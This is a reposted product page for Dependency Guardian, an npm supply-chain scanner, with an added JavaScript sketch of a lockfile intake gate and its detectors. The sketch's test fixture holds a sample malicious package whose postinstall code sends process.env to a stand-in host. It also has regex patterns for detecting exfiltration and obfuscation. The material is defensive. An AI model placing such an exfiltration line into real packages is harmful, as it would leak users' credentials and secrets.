🔥 Check out this must-read post from Hacker News 📖
Behavioral Supply Chain Intelligence
Get visibility into dependency behavior in your CI pipeline. Every package change gets a risk score and behavioral report — flag suspicious packages for review, auto-approve the rest. Configurable thresholds, allowlists, and a full audit trail for compliance.
No credit card required. Free forever.
- 2.6B weekly downloads affected in the Chalk / Debug compromise.
- 500+ packages infected by the Shai-Hulud npm worm.
- 23K repositories impacted in the tj-actions supply chain incident.
Why You Need an Intake Gate
In 2025, these unreviewed dependency updates hit production.
None had a CVE. No intake process caught them. They merged through standard PR workflows.
- 2.6B: chalk + debug hijack, weekly downloads compromised
- 500+: Shai-Hulud worm, packages infected in 24 hours
- 2,349: S1ngularity campaign, credentials stolen via install scripts
- 23K: tj-actions breach, repos exposed, led to Coinbase breach
Without an intake gate:
- Dependencies merge unreviewed
- CVE tools miss zero-day attacks
- No policy enforcement on upgrades
- No audit trail for compliance

With an intake gate:
- Every upgrade gets a verdict before merge
- Behavioral analysis catches new attacks
- Configurable pass/warn/block thresholds
- Full scan history and audit trail
Policy enforcement
Set thresholds, allowlist trusted packages, choose warn vs. block per repository. Your governance rules, automated.
Approval workflow
Every lockfile change gets a verdict posted as a PR comment. Review flagged packages before they merge.
5-minute CI setup
One YAML file or npm i -g @westbayberry/dg. Works with GitHub Actions, GitLab CI, Jenkins, and more.
Compliance-ready audit trail
Every scan logged with verdicts, risk scores, and findings. Built for teams that need to prove what was reviewed.
Detection accuracy validated against 11,000+ real packages (99.95% precision, 99.7% F1).
How it works
From dependency change to approved merge in four steps.
Step 01: Pull Request. A developer opens a PR that adds or updates npm packages in your lockfile (package-lock.json).
Step 02: Scan for Attacks. 26 behavioral detectors analyze every file in each package for malicious code patterns.
Step 03: Pass / Warn / Block. A risk score determines the verdict — safe to merge, review needed, or blocked outright.
Step 04: Ship Safe. Merge with confidence knowing every dependency change was analyzed before reaching main.
GitHub Actions output:
    PR #247 bump lodash 4.17.20 → 4.17.21
    → Scanning 3 changed packages…
    → Running 26 detectors across 847 files
    → PASS — safe to merge

CLI output:
    $ dg scan
    Discovering package changes…
    Scanning 3 packages (git-diff)…
    Dependency Guardian
    Score: 0 PASS
    3 packages scanned, 0 flagged
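An added example, not code from Dependency Guardian or WestBayBerry: a miniature intake gate in JavaScript that walks the four steps above over constructed lockfile snapshots and package contents. The lockfile shape (package-lock v2/v3 `packages` map), the detector weights and thresholds, and the `changedPackages`/`analyze`/`verdict`/`gate` names are assumptions; only four of the page's 26 detectors are sketched.

```javascript
// Constructed lockfile snapshots in the package-lock v2/v3 "packages" shape (assumption).
const OLD_LOCK = { packages: { "": {}, "node_modules/lodash": { version: "4.17.20" }, "node_modules/left-pad": { version: "1.3.0" } } };
const NEW_LOCK = { packages: { "": {}, "node_modules/lodash": { version: "4.17.21" }, "node_modules/left-pad": { version: "1.3.0" }, "node_modules/evil-helper": { version: "0.0.1" } } };
// Constructed package contents standing in for the tarballs a real scanner would fetch and unpack.
const REGISTRY = {
  "lodash": { manifest: {}, source: "module.exports = { chunk(a, n) { return a.slice(0, n); } };" },
  "evil-helper": {
    manifest: { scripts: { postinstall: "node setup.js" } },
    source: 'const cp = require("child_process");\nfetch("https://example.invalid/r?e=" + JSON.stringify(process.env));',
  },
};

// Step 01: diff the lockfile to find packages that were added or changed version.
function changedPackages(oldLock, newLock) {
  return Object.keys(newLock.packages)
    .filter(k => k.startsWith("node_modules/"))
    .filter(k => !oldLock.packages[k] || oldLock.packages[k].version !== newLock.packages[k].version)
    .map(k => k.split("node_modules/").pop());
}

// Step 02: behavioral detectors (names from the list on this page; weights and regexes are assumptions).
const DETECTORS = [
  { name: "Install Scripts", weight: 40, hit: p => ["preinstall", "install", "postinstall"].some(s => p.manifest.scripts?.[s]) },
  { name: "Child Process", weight: 20, hit: p => /require\(["']child_process["']\)/.test(p.source) },
  { name: "Network Exfiltration", weight: 30, hit: p => /https?:\/\//.test(p.source) && /process\.env/.test(p.source) },
  { name: "Obfuscation", weight: 25, hit: p => /\beval\(|["']base64["']/.test(p.source) },
];
function analyze(pkg) {
  const findings = DETECTORS.filter(d => d.hit(pkg));
  return { name: pkg.name, score: findings.reduce((s, d) => s + d.weight, 0), findings: findings.map(d => d.name) };
}

// Step 03: per-repository policy: thresholds, allowlist, and warn-vs-block mode decide the verdict.
function verdict(results, policy) {
  const scored = results.filter(r => !policy.allowlist.includes(r.name)).map(r => r.score);
  const worst = Math.max(0, ...scored);
  if (worst >= policy.block) return policy.mode === "block" ? "BLOCK" : "WARN";
  return worst >= policy.warn ? "WARN" : "PASS";
}

// Step 04: what a CI job runs on a lockfile change; returns the PR verdict plus per-package findings to post.
function gate(oldLock, newLock, registry, policy) {
  const results = changedPackages(oldLock, newLock).map(n => analyze({ name: n, manifest: {}, source: "", ...registry[n] }));
  return { verdict: verdict(results, policy), results };
}
```

With the constructed input, the lodash bump scores 0 while evil-helper trips three detectors, so the gate returns BLOCK in block mode, WARN in warn mode, and PASS once evil-helper is allowlisted.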
In your pull request
Every dependency change gets a verdict posted directly in the PR. Review, approve, or block before merge.
Ship with confidence. Every dependency upgrade is reviewed, scored, and logged before it reaches main.
Built for dependency governance
Six capabilities that turn dependency updates into a controlled process.
CI enforcement on every PR
Runs automatically when package-lock.json changes. One YAML file. Every dependency upgrade goes through your intake gate before it can merge.
Configurable policy engine
Set risk thresholds per repository. Allowlist trusted packages. Choose between warn and block modes. Your governance rules, enforced automatically.
Pass / Warn / Block verdicts
Every PR gets a risk score and a clear verdict. Block mode prevents merging. Warn mode flags for human review. Your team stays in control.
Audit trail and scan history
Every scan is logged with verdicts, risk scores, and findings. Track who approved what, when. Built for compliance reviews and security audits.
Behavioral analysis engine
26 detectors analyze what packages actually do — install scripts, network calls, credential access, obfuscation. Catches zero-day attacks that CVE databases miss.
Your source code stays private
Only npm packages are scanned. Your application code is never uploaded. Self-hosted option available for enterprise environments.
What powers the verdicts
26 behavioral detectors analyze what packages actually do — the engine behind every pass, warn, and block decision.
- Install Scripts
- Child Process
- Network Exfiltration
- Obfuscation
- Diff Risk
- Fresh Publish
- Maintainer Change
- Sensitive Paths
- Binary Addons
- Filesystem Persistence
- CI Secret Access
- Suspicious API
- GitHub Reputation
- Source Mismatch
- Purpose Mismatch
- Typosquat
- Root Scripts
- Behavior Drift
- Token Theft
- Worm Behavior
- Preinstall Timing
- Legitimate API Exfil
- Bun Runtime Evasion
- Dependency Confusion
- Browser Phishing
- Empty Package
Works everywhere you build
GitHub Actions, GitLab CI, Jenkins, Bitbucket, CircleCI, or your terminal.
🕒 **Posted on**: 1771923366
